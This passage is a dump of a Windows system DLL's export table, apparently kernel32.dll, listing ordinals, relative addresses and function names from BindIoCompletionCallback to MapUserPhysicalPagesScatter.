
   0x0020  0x0002C024 "BindIoCompletionCallback"

   0x0021  0x0006BECD "BuildCommDCBA"

   0x0022  0x0006BE9F "BuildCommDCBAndTimeoutsA"

   0x0023  0x0006BEFF "BuildCommDCBAndTimeoutsW"

   0x0024  0x0006BF59 "BuildCommDCBW"

   0x0025  0x00060CD6 "CallNamedPipeA"

   0x0026  0x00060A87 "CallNamedPipeW"

   0x0027  0x00061A9F "CancelDeviceWakeupRequest"

   0x0028  0x000300CA "CancelIo"

   0x0029  0x00063DF8 "CancelTimerQueueTimer"

   0x002A  0x0002CC01 "CancelWaitableTimer"

   0x002B  0x000127B3 "ChangeTimerQueueTimer"

   0x002C  0x00061959 "CheckNameLegalDOS8Dot3A"

   0x002D  0x00061719 "CheckNameLegalDOS8Dot3W"

   0x002E  0x0005AA22 "CheckRemoteDebuggerPresent"

   0x002F  0x00067CD1 "ClearCommBreak"

   0x0030  0x0006655F "ClearCommError"

   0x0031  0x0001D3DE "CloseConsoleHandle"

   0x0032  0x00009BD7 "CloseHandle"

   0x0033  0x0002C865 "CloseProfileUserMapping"

   0x0034  0x0002F5F9 "CmdBatNotification"

   0x0035  0x00067851 "CommConfigDialogA"

   0x0036  0x0006775D "CommConfigDialogW"

   0x0037  0x00010B69 "CompareFileTime"

   0x0038  0x0000D107 "CompareStringA"

   0x0039  0x0000A3EE "CompareStringW"

   0x003A  0x0003144B "ConnectNamedPipe"

   0x003B  0x00072FDF "ConsoleMenuControl"

   0x003C  0x0005B46D "ContinueDebugEvent"

   0x003D  0x000383E7 "ConvertDefaultLocale"

   0x003E  0x0002FEC7 "ConvertFiberToThread"

   0x003F  0x0002FF06 "ConvertThreadToFiber"

   0x0040  0x000286D6 "CopyFileA"

   0x0041  0x0005F2CC "CopyFileExA"

   0x0042  0x00027B1A "CopyFileExW"

   0x0043  0x0002F863 "CopyFileW"

   0x0044  0x0005980A "CopyLZFile"

   0x0045  0x0006C785 "CreateActCtxA"

   0x0046  0x000154EC "CreateActCtxW"

   0x0047  0x00074088 "CreateConsoleScreenBuffer"

   0x0048  0x00021794 "CreateDirectoryA"

   0x0049  0x0005C143 "CreateDirectoryExA"

   0x004A  0x0005B4FA "CreateDirectoryExW"

   0x004B  0x000323EA "CreateDirectoryW"

   0x004C  0x0003089D "CreateEventA"

   0x004D  0x0000A739 "CreateEventW"

   0x004E  0x0002FF9F "CreateFiber"

   0x004F  0x0002FFBF "CreateFiberEx"

   0x0050  0x00001A28 "CreateFileA"

   0x0051  0x000094EE "CreateFileMappingA"

   0x0052  0x00009420 "CreateFileMappingW"

   0x0053  0x000107F0 "CreateFileW"

   0x0054  0x0006C609 "CreateHardLinkA"

   0x0055  0x0006C44C "CreateHardLinkW"

   0x0056  0x00031375 "CreateIoCompletionPort"

   0x0057  0x0006C36C "CreateJobObjectA"

   0x0058  0x0002CAFB "CreateJobObjectW"

   0x0059  0x0006C33E "CreateJobSet"

   0x005A  0x0002CC83 "CreateMailslotA"

   0x005B  0x0002CCD4 "CreateMailslotW"

   0x005C  0x00039672 "CreateMemoryResourceNotification"

   0x005D  0x0000E9CF "CreateMutexA"

   0x005E  0x0000E947 "CreateMutexW"

   0x005F  0x00060B7C "CreateNamedPipeA"

   0x0060  0x0002F0C5 "CreateNamedPipeW"

   0x0061  0x0002AC54 "CreateNlsSecurityDescriptor"

   0x0062  0x0001D827 "CreatePipe"

   0x0063  0x0000236B "CreateProcessA"

   0x0064  0x0001D536 "CreateProcessInternalA"

   0x0065  0x0001979C "CreateProcessInternalW"

   0x0066  0x000806F8 "CreateProcessInternalWSecure"

   0x0067  0x00002336 "CreateProcessW"

   0x0068  0x000104BC "CreateRemoteThread"

   0x0069  0x00012EAD "CreateSemaphoreA"

   0x006A  0x00010116 "CreateSemaphoreW"

   0x006B  0x0006C674 "CreateSocketHandle"

   0x006C  0x0006C12E "CreateTapePartition"

   0x006D  0x000106C7 "CreateThread"

   0x006E  0x0002BFCE "CreateTimerQueue"

   0x006F  0x00021165 "CreateTimerQueueTimer"

   0x0070  0x00065B1F "CreateToolhelp32Snapshot"

   0x0071  0x0003494A "CreateVirtualBuffer"

   0x0072  0x00062AC1 "CreateWaitableTimerA"

   0x0073  0x0002FB42 "CreateWaitableTimerW"

   0x0074  0x0000A705 "DeactivateActCtx"

   0x0075  0x0005B02B "DebugActiveProcess"

   0x0076  0x0005B4B1 "DebugActiveProcessStop"

   0x0077  0x0005AA76 "DebugBreak"

   0x0078  0x0005B07E "DebugBreakProcess"

   0x0079  0x0005B0A5 "DebugSetProcessKillOnExit"

   0x007A  0x0000901A "DecodePointer"

   0x007B  0x00009031 "DecodeSystemPointer"

   0x007C  0x0005D1CD "DefineDosDeviceA"

   0x007D  0x00021F06 "DefineDosDeviceW"

   0x007E  0x0007EECD "DelayLoadFailureHook"

   0x007F  0x000326AD "DeleteAtom"

   0x0080  0x0000904E "DeleteCriticalSection"

   0x0081  0x0002FE74 "DeleteFiber"

   0x0082  0x00031EC5 "DeleteFileA"

   0x0083  0x00031F4B "DeleteFileW"

   0x0084  0x00063DCB "DeleteTimerQueue"

   0x0085  0x00063D84 "DeleteTimerQueueEx"

   0x0086  0x00021118 "DeleteTimerQueueTimer"

   0x0087  0x0006B0BE "DeleteVolumeMountPointA"

   0x0088  0x0006A910 "DeleteVolumeMountPointW"

   0x0089  0x00001629 "DeviceIoControl"

   0x008A  0x00011326 "DisableThreadLibraryCalls"

   0x008B  0x0001272F "DisconnectNamedPipe"

   0x008C  0x00058A2B "DnsHostnameToComputerNameA"

   0x008D  0x0002CEAA "DnsHostnameToComputerNameW"

   0x008E  0x00032168 "DosDateTimeToFileTime"

   0x008F  0x000627D9 "DosPathToSessionPathA"

   0x0090  0x0002C1DF "DosPathToSessionPathW"

   0x0091  0x0001D4AD "DuplicateConsoleHandle"

   0x0092  0x0000DE8E "DuplicateHandle"

   0x0093  0x0000906D "EncodePointer"

   0x0094  0x00009084 "EncodeSystemPointer"

   0x0095  0x00070969 "EndUpdateResourceA"

   0x0096  0x00070792 "EndUpdateResourceW"

   0x0097  0x000090A1 "EnterCriticalSection"

   0x0098  0x00038229 "EnumCalendarInfoA"

   0x0099  0x00076769 "EnumCalendarInfoExA"

   0x009A  0x0007979D "EnumCalendarInfoExW"

   0x009B  0x0007977A "EnumCalendarInfoW"

   0x009C  0x000767AA "EnumDateFormatsA"

   0x009D  0x000767CA "EnumDateFormatsExA"

   0x009E  0x000797C0 "EnumDateFormatsExW"

   0x009F  0x000387F9 "EnumDateFormatsW"

   0x00A0  0x00076808 "EnumLanguageGroupLocalesA"

   0x00A1  0x00079723 "EnumLanguageGroupLocalesW"

   0x00A2  0x0002DFF8 "EnumResourceLanguagesA"

   0x00A3  0x00060539 "EnumResourceLanguagesW"

   0x00A4  0x00060131 "EnumResourceNamesA"

   0x00A5  0x00055A51 "EnumResourceNamesW"

   0x00A6  0x0005FF44 "EnumResourceTypesA"

   0x00A7  0x00060351 "EnumResourceTypesW"

   0x00A8  0x00076847 "EnumSystemCodePagesA"

   0x00A9  0x0007975F "EnumSystemCodePagesW"

   0x00AA  0x00079BF9 "EnumSystemGeoID"

   0x00AB  0x000767EA "EnumSystemLanguageGroupsA"

   0x00AC  0x00079705 "EnumSystemLanguageGroupsW"

   0x00AD  0x00037CF9 "EnumSystemLocalesA"

   0x00AE  0x00079744 "EnumSystemLocalesW"

   0x00AF  0x0007678C "EnumTimeFormatsA"

   0x00B0  0x000388D6 "EnumTimeFormatsW"

   0x00B1  0x00076829 "EnumUILanguagesA"

   0x00B2  0x0002A8C4 "EnumUILanguagesW"

   0x00B3  0x0005897F "EnumerateLocalComputerNamesA"

   0x00B4  0x000587FF "EnumerateLocalComputerNamesW"

   0x00B5  0x0006C0FB "EraseTape"

   0x00B6  0x00066771 "EscapeCommFunction"

   0x00B7  0x0001CAFA "ExitProcess"

   0x00B8  0x0000C0E8 "ExitThread"

   0x00B9  0x00068675 "ExitVDM"

   0x00BA  0x000329F1 "ExpandEnvironmentStringsA"

   0x00BB  0x000305E6 "ExpandEnvironmentStringsW"

   0x00BC  0x00071647 "ExpungeConsoleCommandHistoryA"

   0x00BD  0x0007162F "ExpungeConsoleCommandHistoryW"

   0x00BE  0x0005FAFC "ExtendVirtualBuffer"

   0x00BF  0x00061C00 "FatalAppExitA"

   0x00C0  0x00061BB2 "FatalAppExitW"

   0x00C1  0x00061C4E "FatalExit"

   0x00C2  0x0003064D "FileTimeToDosDateTime"

   0x00C3  0x0000E8F6 "FileTimeToLocalFileTime"

   0x00C4  0x0000E87C "FileTimeToSystemTime"

   0x00C5  0x00074064 "FillConsoleOutputAttribute"

   0x00C6  0x00074019 "FillConsoleOutputCharacterA"

   0x00C7  0x00074040 "FillConsoleOutputCharacterW"

   0x00C8  0x00030F11 "FindActCtxSectionGuid"

   0x00C9  0x0006CAEF "FindActCtxSectionStringA"

   0x00CA  0x0002FD3C "FindActCtxSectionStringW"

   0x00CB  0x00030CEE "FindAtomA"

   0x00CC  0x0002F817 "FindAtomW"

   0x00CD  0x0000EE67 "FindClose"

   0x00CE  0x000357ED "FindCloseChangeNotification"

   0x00CF  0x0005D3B3 "FindFirstChangeNotificationA"

   0x00D0  0x00034C07 "FindFirstChangeNotificationW"

   0x00D1  0x00013869 "FindFirstFileA"

   0x00D2  0x0005D41A "FindFirstFileExA"

   0x00D3  0x0000EB0D "FindFirstFileExW"

   0x00D4  0x0000EF71 "FindFirstFileW"

   0x00D5  0x0006B239 "FindFirstVolumeA"

   0x00D6  0x0006ACF9 "FindFirstVolumeMountPointA"

   0x00D7  0x00069D91 "FindFirstVolumeMountPointW"

   0x00D8  0x0002D2A7 "FindFirstVolumeW"

   0x00D9  0x0003212D "FindNextChangeNotification"

   0x00DA  0x00034EC9 "FindNextFileA"

   0x00DB  0x0000EFCA "FindNextFileW"

   0x00DC  0x0006ABDF "FindNextVolumeA"

   0x00DD  0x0006AE29 "FindNextVolumeMountPointA"

   0x00DE  0x0006A03D "FindNextVolumeMountPointW"

   0x00DF  0x0002CF93 "FindNextVolumeW"

   0x00E0  0x0000BF19 "FindResourceA"

   0x00E1  0x00035F90 "FindResourceExA"

   0x00E2  0x0000AD18 "FindResourceExW"

   0x00E3  0x0000BC5E "FindResourceW"

   0x00E4  0x0002CF58 "FindVolumeClose"

   0x00E5  0x000357ED "FindVolumeMountPointClose"

   0x00E6  0x00074B3C "FlushConsoleInputBuffer"

   0x00E7  0x000126D1 "FlushFileBuffers"

   0x00E8  0x000355D4 "FlushInstructionCache"

   0x00E9  0x00035989 "FlushViewOfFile"

   0x00EA  0x00076ED1 "FoldStringA"

   0x00EB  0x0007A656 "FoldStringW"

   0x00EC  0x0002F790 "FormatMessageA"

   0x00ED  0x00034BA7 "FormatMessageW"

   0x00EE  0x000720AD "FreeConsole"

   0x00EF  0x0001D6D7 "FreeEnvironmentStringsA"

   0x00F0  0x00014B77 "FreeEnvironmentStringsW"

   0x00F1  0x0000AC6E "FreeLibrary"

   0x00F2  0x0000C200 "FreeLibraryAndExitThread"

   0x00F3  0x000260AA "FreeResource"

   0x00F4  0x0005F648 "FreeUserPhysicalPages"

   0x00F5  0x00034B81 "FreeVirtualBuffer"

   0x00F6  0x00074A41 "GenerateConsoleCtrlEvent"

   0x00F7  0x000099A5 "GetACP"

   0x00F8  0x0005C1B3 "GetAtomNameA"

   0x00F9  0x000330FF "GetAtomNameW"

   0x00FA  0x0006900B "GetBinaryType"

   0x00FB  0x0006900B "GetBinaryTypeA"

   0x00FC  0x00068BAC "GetBinaryTypeW"

   0x00FD  0x000384F3 "GetCPFileNameFromRegistry"

   0x00FE  0x00012F06 "GetCPInfo"

   0x00FF  0x00077067 "GetCPInfoExA"

   0x0100  0x0007B1ED "GetCPInfoExW"

   0x0101  0x0007698B "GetCalendarInfoA"

   0x0102  0x00039038 "GetCalendarInfoW"

   0x0103  0x0006CB82 "GetComPlusPackageInstallStatus"

   0x0104  0x00067CE9 "GetCommConfig"

   0x0105  0x0006686D "GetCommMask"

   0x0106  0x000668F6 "GetCommModemStatus"

   0x0107  0x0006697F "GetCommProperties"

   0x0108  0x00066A37 "GetCommState"

   0x0109  0x00022110 "GetCommTimeouts"

   0x010A  0x00012FAD "GetCommandLineA"

   0x010B  0x00017013 "GetCommandLineW"

   0x010C  0x0005E3A1 "GetCompressedFileSizeA"

   0x010D  0x0005E279 "GetCompressedFileSizeW"

   0x010E  0x0002168C "GetComputerNameA"

   0x010F  0x00058703 "GetComputerNameExA"

   0x0110  0x000201D9 "GetComputerNameExW"

   0x0111  0x000316B7 "GetComputerNameW"

   0x0112  0x000710D2 "GetConsoleAliasA"

   0x0113  0x0007156C "GetConsoleAliasExesA"

   0x0114  0x00071272 "GetConsoleAliasExesLengthA"

   0x0115  0x00071265 "GetConsoleAliasExesLengthW"

   0x0116  0x00071551 "GetConsoleAliasExesW"

   0x0117  0x000710A6 "GetConsoleAliasW"

   0x0118  0x00071407 "GetConsoleAliasesA"

   0x0119  0x000711D9 "GetConsoleAliasesLengthA"

   0x011A  0x000711C1 "GetConsoleAliasesLengthW"

   0x011B  0x000713E9 "GetConsoleAliasesW"

   0x011C  0x000750F3 "GetConsoleCP"

   0x011D  0x000761C3 "GetConsoleCharType"

   0x011E  0x000719C7 "GetConsoleCommandHistoryA"

   0x011F  0x00071825 "GetConsoleCommandHistoryLengthA"

   0x0120  0x0007180D "GetConsoleCommandHistoryLengthW"

   0x0121  0x000719A9 "GetConsoleCommandHistoryW"

   0x0122  0x00074581 "GetConsoleCursorInfo"

   0x0123  0x0007581F "GetConsoleCursorMode"

   0x0124  0x00037C6B "GetConsoleDisplayMode"

   0x0125  0x000747B9 "GetConsoleFontInfo"

   0x0126  0x000748E1 "GetConsoleFontSize"

   0x0127  0x00072C39 "GetConsoleHardwareState"

   0x0128  0x00071D1C "GetConsoleInputExeNameA"

   0x0129  0x00071AF1 "GetConsoleInputExeNameW"

   0x012A  0x00072619 "GetConsoleInputWaitHandle"

   0x012B  0x00075349 "GetConsoleKeyboardLayoutNameA"

   0x012C  0x00075361 "GetConsoleKeyboardLayoutNameW"

   0x012D  0x0001AC38 "GetConsoleMode"

   0x012E  0x00075FA7 "GetConsoleNlsMode"

   0x012F  0x0001AEAF "GetConsoleOutputCP"

   0x0130  0x000753E5 "GetConsoleProcessList"

   0x0131  0x0001B94B "GetConsoleScreenBufferInfo"

   0x0132  0x00074649 "GetConsoleSelectionInfo"

   0x0133  0x00071A59 "GetConsoleTitleA"

   0x0134  0x0001B75C "GetConsoleTitleW"

   0x0135  0x00075379 "GetConsoleWindow"

   0x0136  0x00076B99 "GetCurrencyFormatA"

   0x0137  0x0007C6EA "GetCurrencyFormatW"

   0x0138  0x00030099 "GetCurrentActCtx"

   0x0139  0x0007496F "GetCurrentConsoleFont"

   0x013A  0x00035016 "GetCurrentDirectoryA"

   0x013B  0x0000B907 "GetCurrentDirectoryW"

   0x013C  0x0000DE85 "GetCurrentProcess"

   0x013D  0x000099B0 "GetCurrentProcessId"

   0x013E  0x0000997B "GetCurrentThread"

   0x013F  0x000097B8 "GetCurrentThreadId"

   0x0140  0x00036206 "GetDateFormatA"

   0x0141  0x0003378D "GetDateFormatW"

   0x0142  0x00067A21 "GetDefaultCommConfigA"

   0x0143  0x00067929 "GetDefaultCommConfigW"

   0x0144  0x0007BA61 "GetDefaultSortkeySize"

   0x0145  0x00061A24 "GetDevicePowerState"

   0x0146  0x000302DD "GetDiskFreeSpaceA"

   0x0147  0x0003038B "GetDiskFreeSpaceExA"

   0x0148  0x00012893 "GetDiskFreeSpaceExW"

   0x0149  0x0003019F "GetDiskFreeSpaceW"

   0x014A  0x0005FE4F "GetDllDirectoryA"

   0x014B  0x0005FCDF "GetDllDirectoryW"

   0x014C  0x000214CB "GetDriveTypeA"

   0x014D  0x0000B360 "GetDriveTypeW"

   0x014E  0x0001CC7B "GetEnvironmentStrings"

   0x014F  0x0001CC7B "GetEnvironmentStringsA"

   0x0150  0x00012F98 "GetEnvironmentStringsW"

   0x0151  0x00014B82 "GetEnvironmentVariableA"

   0x0152  0x0000F184 "GetEnvironmentVariableW"

   0x0153  0x0001AB3B "GetExitCodeProcess"

   0x0154  0x0002141D "GetExitCodeThread"

   0x0155  0x00065BA7 "GetExpandedNameA"

   0x0156  0x00065C54 "GetExpandedNameW"

   0x0157  0x000115CC "GetFileAttributesA"

   0x0158  0x00013841 "GetFileAttributesExA"

   0x0159  0x00011185 "GetFileAttributesExW"

   0x015A  0x0000B7DC "GetFileAttributesW"

   0x015B  0x00010CFD "GetFileInformationByHandle"

   0x015C  0x00010B07 "GetFileSize"

   0x015D  0x00010A99 "GetFileSizeEx"

   0x015E  0x00031C35 "GetFileTime"

   0x015F  0x00010EE1 "GetFileType"

   0x0160  0x0005F43C "GetFirmwareEnvironmentVariableA"

   0x0161  0x0005F325 "GetFirmwareEnvironmentVariableW"

   0x0162  0x0001398C "GetFullPathNameA"

   0x0163  0x0000B8E2 "GetFullPathNameW"

   0x0164  0x00076862 "GetGeoInfoA"

   0x0165  0x00079867 "GetGeoInfoW"

   0x0166  0x0006C663 "GetHandleContext"

   0x0167  0x0002BDAD "GetHandleInformation"

   0x0168  0x00075651 "GetLargestConsoleWindowSize"

   0x0169  0x000090BF "GetLastError"

   0x016A  0x0007BA8B "GetLinguistLangSize"

   0x016B  0x0000A864 "GetLocalTime"

   0x016C  0x0000D2F2 "GetLocaleInfoA"

   0x016D  0x000115F2 "GetLocaleInfoW"

   0x016E  0x0002C2CB "GetLogicalDriveStringsA"

   0x016F  0x000612D7 "GetLogicalDriveStringsW"

   0x0170  0x00030B04 "GetLogicalDrives"

   0x0171  0x00061C97 "GetLogicalProcessorInformation"

   0x0172  0x00069566 "GetLongPathNameA"

   0x0173  0x000133E3 "GetLongPathNameW"

   0x0174  0x0005FA60 "GetMailslotInfo"

   0x0175  0x0000B55F "GetModuleFileNameA"

   0x0176  0x0000B465 "GetModuleFileNameW"

   0x0177  0x0000B731 "GetModuleHandleA"

   0x0178  0x0005FEEE "GetModuleHandleExA"

   0x0179  0x0001FCA9 "GetModuleHandleExW"

   0x017A  0x0000E4CD "GetModuleHandleW"

   0x017B  0x00060BF3 "GetNamedPipeHandleStateA"

   0x017C  0x0006098D "GetNamedPipeHandleStateW"

   0x017D  0x00060792 "GetNamedPipeInfo"

   0x017E  0x0003795D "GetNativeSystemInfo"

   0x017F  0x00067F23 "GetNextVDMCommand"

   0x0180  0x0001800D "GetNlsSectionName"

   0x0181  0x00060ECC "GetNumaAvailableMemory"

   0x0182  0x00060F12 "GetNumaAvailableMemoryNode"

   0x0183  0x00060D49 "GetNumaHighestNodeNumber"

   0x0184  0x00060E21 "GetNumaNodeProcessorMask"

   0x0185  0x00060E86 "GetNumaProcessorMap"

   0x0186  0x00060D94 "GetNumaProcessorNode"

   0x0187  0x0002EC3C "GetNumberFormatA"

   0x0188  0x000344D4 "GetNumberFormatW"

   0x0189  0x00075521 "GetNumberOfConsoleFonts"

   0x018A  0x0007558D "GetNumberOfConsoleInputEvents"

   0x018B  0x00074701 "GetNumberOfConsoleMouseButtons"

   0x018C  0x00012837 "GetOEMCP"

   0x018D  0x000315B4 "GetOverlappedResult"

   0x018E  0x00061D97 "GetPriorityClass"

   0x018F  0x0003644C "GetPrivateProfileIntA"

   0x0190  0x00032748 "GetPrivateProfileIntW"

   0x0191  0x00035F39 "GetPrivateProfileSectionA"

   0x0192  0x00032DBF "GetPrivateProfileSectionNamesA"

   0x0193  0x0005CA12 "GetPrivateProfileSectionNamesW"

   0x0194  0x0001EDA5 "GetPrivateProfileSectionW"

   0x0195  0x00032B6E "GetPrivateProfileStringA"

   0x0196  0x0000F9ED "GetPrivateProfileStringW"

   0x0197  0x0005CA33 "GetPrivateProfileStructA"

   0x0198  0x0005CB9D "GetPrivateProfileStructW"

   0x0199  0x0000AE30 "GetProcAddress"

   0x019A  0x0002174D "GetProcessAffinityMask"

   0x019B  0x000621AD "GetProcessDEPPolicy"

   0x019C  0x0006210A "GetProcessHandleCount"

   0x019D  0x0000AC51 "GetProcessHeap"

   0x019E  0x0005F8E3 "GetProcessHeaps"

   0x019F  0x00061B7D "GetProcessId"

   0x01A0  0x000620D9 "GetProcessIoCounters"

   0x01A1  0x0006209F "GetProcessPriorityBoost"

   0x01A2  0x00061DFD "GetProcessShutdownParameters"

   0x01A3  0x000352F1 "GetProcessTimes"

   0x01A4  0x00012CB3 "GetProcessVersion"

   0x01A5  0x00061FEC "GetProcessWorkingSetSize"

   0x01A6  0x000364C1 "GetProfileIntA"

   0x01A7  0x0002F88A "GetProfileIntW"

   0x01A8  0x0005CFDF "GetProfileSectionA"

   0x01A9  0x0005D018 "GetProfileSectionW"

   0x01AA  0x0002147D "GetProfileStringA"

   0x01AB  0x000213E0 "GetProfileStringW"

   0x01AC  0x0000A7AD "GetQueuedCompletionStatus"

   0x01AD  0x00035BC8 "GetShortPathNameA"

   0x01AE  0x0001F256 "GetShortPathNameW"

   0x01AF  0x00001EF2 "GetStartupInfoA"

   0x01B0  0x00001E54 "GetStartupInfoW"

   0x01B1  0x00012FC9 "GetStdHandle"

   0x01B2  0x00038A24 "GetStringTypeA"

   0x01B3  0x000770EF "GetStringTypeExA"

   0x01B4  0x0000C07F "GetStringTypeExW"

   0x01B5  0x0000A520 "GetStringTypeW"

   0x01B6  0x00061C60 "GetSystemDEPPolicy"

   0x01B7  0x0000BFCD "GetSystemDefaultLCID"

   0x01B8  0x00012842 "GetSystemDefaultLangID"

   0x01B9  0x000130C8 "GetSystemDefaultUILanguage"

   0x01BA  0x00014F7A "GetSystemDirectoryA"

   0x01BB  0x00031DD3 "GetSystemDirectoryW"

   0x01BC  0x00012DE6 "GetSystemInfo"

   0x01BD  0x00035358 "GetSystemPowerStatus"

   0x01BE  0x00062200 "GetSystemRegistryQuota"

   0x01BF  0x0000176F "GetSystemTime"

   0x01C0  0x0002D367 "GetSystemTimeAdjustment"

   0x01C1  0x000017E9 "GetSystemTimeAsFileTime"

   0x01C2  0x00061EA6 "GetSystemTimes"

   0x01C3  0x000212D9 "GetSystemWindowsDirectoryA"

   0x01C4  0x0000ADB9 "GetSystemWindowsDirectoryW"

   0x01C5  0x00021454 "GetSystemWow64DirectoryA"

   0x01C6  0x00021454 "GetSystemWow64DirectoryW"

   0x01C7  0x0006C1A2 "GetTapeParameters"

   0x01C8  0x0006C06C "GetTapePosition"

   0x01C9  0x0006C23F "GetTapeStatus"

   0x01CA  0x00061807 "GetTempFileNameA"

   0x01CB  0x000359CF "GetTempFileNameW"

   0x01CC  0x00035DE2 "GetTempPathA"

   0x01CD  0x00030779 "GetTempPathW"

   0x01CE  0x00039725 "GetThreadContext"

   0x01CF  0x00063D11 "GetThreadIOPendingFlag"

   0x01D0  0x0000A4A5 "GetThreadLocale"

   0x01D1  0x0000A823 "GetThreadPriority"

   0x01D2  0x00063A6F "GetThreadPriorityBoost"

   0x01D3  0x0005B0F0 "GetThreadSelectorEntry"

   0x01D4  0x00063CA4 "GetThreadTimes"

   0x01D5  0x0000932E "GetTickCount"

   0x01D6  0x00036345 "GetTimeFormatA"

   0x01D7  0x00033FEB "GetTimeFormatW"

   0x01D8  0x000350D7 "GetTimeZoneInformation"

   0x01D9  0x00009FA0 "GetUserDefaultLCID"

   0x01DA  0x0000BFF4 "GetUserDefaultLangID"

   0x01DB  0x00013100 "GetUserDefaultUILanguage"

   0x01DC  0x000379A6 "GetUserGeoID"

   0x01DD  0x00068829 "GetVDMCurrentDirectories"

   0x01DE  0x0001126A "GetVersion"

   0x01DF  0x00012B6E "GetVersionExA"

   0x01E0  0x0000AEF5 "GetVersionExW"

   0x01E1  0x00021B8D "GetVolumeInformationA"

   0x01E2  0x0000FA75 "GetVolumeInformationW"

   0x01E3  0x0006AF41 "GetVolumeNameForVolumeMountPointA"

   0x01E4  0x0001FB70 "GetVolumeNameForVolumeMountPointW"

   0x01E5  0x0002E87B "GetVolumePathNameA"

   0x01E6  0x0002E5E5 "GetVolumePathNameW"

   0x01E7  0x0006B0E0 "GetVolumePathNamesForVolumeNameA"

   0x01E8  0x00020CFC "GetVolumePathNamesForVolumeNameW"

   0x01E9  0x0002134B "GetWindowsDirectoryA"

   0x01EA  0x0000AE0B "GetWindowsDirectoryW"

   0x01EB  0x0005F6D2 "GetWriteWatch"

   0x01EC  0x000360C1 "GlobalAddAtomA"

   0x01ED  0x000100FC "GlobalAddAtomW"

   0x01EE  0x0000FDBD "GlobalAlloc"

   0x01EF  0x0005F578 "GlobalCompact"

   0x01F0  0x00030BAB "GlobalDeleteAtom"

   0x01F1  0x000360DB "GlobalFindAtomA"

   0x01F2  0x00034EAF "GlobalFindAtomW"

   0x01F3  0x0005F58E "GlobalFix"

   0x01F4  0x0003678A "GlobalFlags"

   0x01F5  0x0000FCBF "GlobalFree"

   0x01F6  0x0005C193 "GlobalGetAtomNameA"

   0x01F7  0x0002C3B6 "GlobalGetAtomNameW"

   0x01F8  0x00034CD1 "GlobalHandle"

   0x01F9  0x0000FFA9 "GlobalLock"

   0x01FA  0x000310E2 "GlobalMemoryStatus"

   0x01FB  0x0001F97A "GlobalMemoryStatusEx"

   0x01FC  0x00012449 "GlobalReAlloc"

   0x01FD  0x00034DB9 "GlobalSize"

   0x01FE  0x0005F5D2 "GlobalUnWire"

   0x01FF  0x0005F5A8 "GlobalUnfix"

   0x0200  0x0000FF12 "GlobalUnlock"

   0x0201  0x0005F5C2 "GlobalWire"

   0x0202  0x00064AB6 "Heap32First"

   0x0203  0x00064971 "Heap32ListFirst"

   0x0204  0x00064A1F "Heap32ListNext"

   0x0205  0x00064BD0 "Heap32Next"

   0x0206  0x000090DA "HeapAlloc"

   0x0207  0x00036136 "HeapCompact"

   0x0208  0x00012C46 "HeapCreate"

   0x0209  0x0005F7D1 "HeapCreateTagsW"

   0x020A  0x00010F88 "HeapDestroy"

   0x020B  0x0005F7A0 "HeapExtend"

   0x020C  0x000090F0 "HeapFree"

   0x020D  0x0005F8F4 "HeapLock"

   0x020E  0x0005FA2D "HeapQueryInformation"

   0x020F  0x0005F7E2 "HeapQueryTagW"

   0x0210  0x00009102 "HeapReAlloc"

   0x0211  0x00039481 "HeapSetInformation"

   0x0212  0x0000911A "HeapSize"

   0x0213  0x0005F7F3 "HeapSummary"

   0x0214  0x0005F90E "HeapUnlock"

   0x0215  0x0005F84F "HeapUsage"

   0x0216  0x0005F8C3 "HeapValidate"

   0x0217  0x0005F928 "HeapWalk"

   0x0218  0x0002AF77 "InitAtomTable"

   0x0219  0x00009F81 "InitializeCriticalSection"

   0x021A  0x0000B8B9 "InitializeCriticalSectionAndSpinCount"

   0x021B  0x0000912C "InitializeSListHead"

   0x021C  0x00009832 "InterlockedCompareExchange"

   0x021D  0x0000980A "InterlockedDecrement"

   0x021E  0x0000981E "InterlockedExchange"

   0x021F  0x00009846 "InterlockedExchangeAdd"

   0x0220  0x00009149 "InterlockedFlushSList"

   0x0221  0x000097F6 "InterlockedIncrement"

   0x0222  0x00009168 "InterlockedPopEntrySList"

   0x0223  0x0000918A "InterlockedPushEntrySList"

   0x0224  0x00074235 "InvalidateConsoleDIBits"

   0x0225  0x0000BD5F "IsBadCodePtr"

   0x0226  0x00035957 "IsBadHugeReadPtr"

   0x0227  0x0000C02D "IsBadHugeWritePtr"

   0x0228  0x00009E91 "IsBadReadPtr"

   0x0229  0x00032273 "IsBadStringPtrA"

   0x022A  0x0000A66C "IsBadStringPtrW"

   0x022B  0x00009F09 "IsBadWritePtr"

   0x022C  0x0000B86C "IsDBCSLeadByte"

   0x022D  0x0007B4EE "IsDBCSLeadByteEx"

   0x022E  0x00013123 "IsDebuggerPresent"

   0x022F  0x0006C304 "IsProcessInJob"

   0x0230  0x0000AEBA "IsProcessorFeaturePresent"

   0x0231  0x00061A68 "IsSystemResumeAutomatic"

   0x0232  0x0001115B "IsValidCodePage"

   0x0233  0x0007740F "IsValidLanguageGroup"

   0x0234  0x0001C1AB "IsValidLocale"

   0x0235  0x0007751B "IsValidUILanguage"

   0x0236  0x00015229 "IsWow64Process"

   0x0237  0x00038E00 "LCMapStringA"

   0x0238  0x0000CD38 "LCMapStringW"

   0x0239  0x0006649E "LZClose"

   0x023A  0x00066427 "LZCloseFile"

   0x023B  0x00059754 "LZCopy"

   0x023C  0x00065F5D "LZCreateFileW"

   0x023D  0x000806F8 "LZDone"

   0x023E  0x00065E02 "LZInit"

   0x023F  0x00066030 "LZOpenFileA"

   0x0240  0x000660F7 "LZOpenFileW"

   0x0241  0x00066219 "LZRead"

   0x0242  0x0006618E "LZSeek"

   0x0243  0x0008012E "LZStart"

   0x0244  0x000091AD "LeaveCriticalSection"

   0x0245  0x00001D7B "LoadLibraryA"

   0x0246  0x00001D53 "LoadLibraryExA"

   0x0247  0x00001AF5 "LoadLibraryExW"

   0x0248  0x0000AEDB "LoadLibraryW"

   0x0249  0x000624BE "LoadModule"

   0x024A  0x0000A045 "LoadResource"

   0x024B  0x00009A1D "LocalAlloc"

   0x024C  0x0005F578 "LocalCompact"

   0x024D  0x0003553C "LocalFileTimeToFileTime"

   0x024E  0x00055D56 "LocalFlags"

   0x024F  0x000099BF "LocalFree"

   0x0250  0x00055E51 "LocalHandle"

   0x0251  0x00032E35 "LocalLock"

   0x0252  0x00030917 "LocalReAlloc"

   0x0253  0x0005F78A "LocalShrink"

   0x0254  0x000325D4 "LocalSize"

   0x0255  0x00032EC9 "LocalUnlock"

   0x0256  0x00032379 "LockFile"

   0x0257  0x0002F559 "LockFileEx"

   0x0258  0x0000CD27 "LockResource"

   0x0259  0x0005F676 "MapUserPhysicalPages"

   0x025A  0x0005F6A4 "MapUserPhysicalPagesScatter"

